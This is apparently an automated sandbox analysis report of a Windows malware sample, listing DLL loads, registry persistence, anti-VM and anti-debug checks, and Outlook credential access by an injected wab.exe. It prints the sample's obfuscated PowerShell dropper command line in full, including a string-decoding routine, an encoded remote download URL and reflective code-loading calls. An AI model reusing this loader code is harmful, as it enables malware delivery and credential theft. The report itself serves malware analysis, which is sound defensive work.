              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
              Source: Google Drive.lnk.7.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: YouTube.lnk.7.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Sheets.lnk.7.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Gmail.lnk.7.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Slides.lnk.7.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Docs.lnk.7.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000005.00000002.2590121491.000000000831A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2587009002.0000000007134000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbw source: powershell.exe, 00000005.00000002.2587009002.00000000071A8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: mshta.exe, 00000000.00000003.1998389233.0000000008651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1995220103.00000000085CD000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.2587009002.0000000007146000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000005.00000002.2587009002.00000000071A8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbeKug source: powershell.exe, 00000005.00000002.2587009002.00000000071A8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2576907258.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2576907258.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: Yara match File source: 00000005.00000002.2590524362.0000000008E66000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.2590409597.0000000008570000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.2584352581.0000000005919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000002.2795865098.00000000059E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Syvaarsdrenge)$global:Saamaskines = [System.Text.Encoding]::ASCII.GetString($Decompressive)$global:Economization=$Saamaskines.substring(324810,27925)<#Arvings lactoside Delagtiggres
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Gnags $Prevailingly $Turboladningernes), (Begrdes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Sveskerne = [AppDomain]::CurrentDomain.GetAssemblies()$gl
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Navigationsskolen)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Weaned, $false).DefineType($Broadside,
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . 
MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teS
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . 
MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teS
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 16_2_004044A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_02D90E75 push esi; iretd 1_2_02D90E9A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_02D93A64 push ebx; retf 1_2_02D93ADA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_075D6B05 push 0000C33Dh; ret 1_2_075D6B4B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_075D08C2 push eax; mov dword ptr [esp], ecx 1_2_075D0AC4
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22CA1E0F push ds; retf 0022h 10_2_22CA1E12
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22CA1219 push esp; iretd 10_2_22CA121A
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22CA1E2C push ds; retf 0022h 10_2_22CA1E32
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22C92806 push ecx; ret 10_2_22C92819
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_22CA1DFD push ds; retf 0022h 10_2_22CA1DFE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03AC228D push cs; iretd 10_2_03AC224C
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03AC2A15 pushad ; ret 10_2_03AC2A16
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03AC2213 push cs; iretd 10_2_03AC224C
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03AC424A push ecx; iretd 10_2_03AC4255
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03AC21BE push cs; iretd 10_2_03AC224C
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03AC45EA push edi; iretd 10_2_03AC45ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03AC0D00 push 929B4AF7h; retf 10_2_03AC0D31
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03AC04B0 push ecx; iretd 10_2_03AC0515
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_03AC341A push cs; ret 10_2_03AC341B
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044693D push ecx; ret 16_2_0044694D
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044DB70 push eax; ret 16_2_0044DB84
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0044DB70 push eax; ret 16_2_0044DBAC
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00451D54 push eax; ret 16_2_00451D61
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0044B090 push eax; ret 19_2_0044B0A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_0044B090 push eax; ret 19_2_0044B0CC
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00451D34 push eax; ret 19_2_00451D41
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00444E71 push ecx; ret 19_2_00444E81
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00414060 push eax; ret 22_2_00414074
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00414060 push eax; ret 22_2_0041409C
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00414039 push ecx; ret 22_2_00414049
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_004164EB push 0000006Ah; retf 22_2_004165C4
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 22_2_00416553 push 0000006Ah; retf 22_2_004165C4
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
              Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Straddlers
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 19_2_004047CB
              Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,16_2_0040DD85
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6342
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3439
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7813
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1748
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 3209
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 9.6 %
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4324Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 5784Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2848Thread sleep count: 7813 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2848Thread sleep count: 1748 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6432Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2804Thread sleep count: 3209 > 30
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 3209 delay: -5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22C910F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_22C910F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22C96580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,10_2_22C96580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040AE51 FindFirstFileW,FindNextFileW,16_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 19_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407EF8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 22_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,22_2_00407898
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_00418981 memset,GetSystemInfo,16_2_00418981
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: mshta.exe, 00000000.00000003.2009239128.0000000002C07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: powershell.exe, 00000001.00000002.2806985847.00000000073F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll G
              Source: svchost.exe, 00000003.00000002.3227073694.0000021BB3E56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3224868475.0000021BAE82B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.000000000734C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.3229466080.00000000072F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI call chain: ExitProcess graph end nodegraph_19-34119
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPort
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22C96ACB GetCPInfo,LdrInitializeThunk,10_2_22C96ACB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22C92639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_22C92639
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,16_2_0040DD85
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 16_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,16_2_004044A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22C94AB4 mov eax, dword ptr fs:[00000030h]10_2_22C94AB4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_22C9724E GetProcessHeap,10_2_22C9724E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: Debug
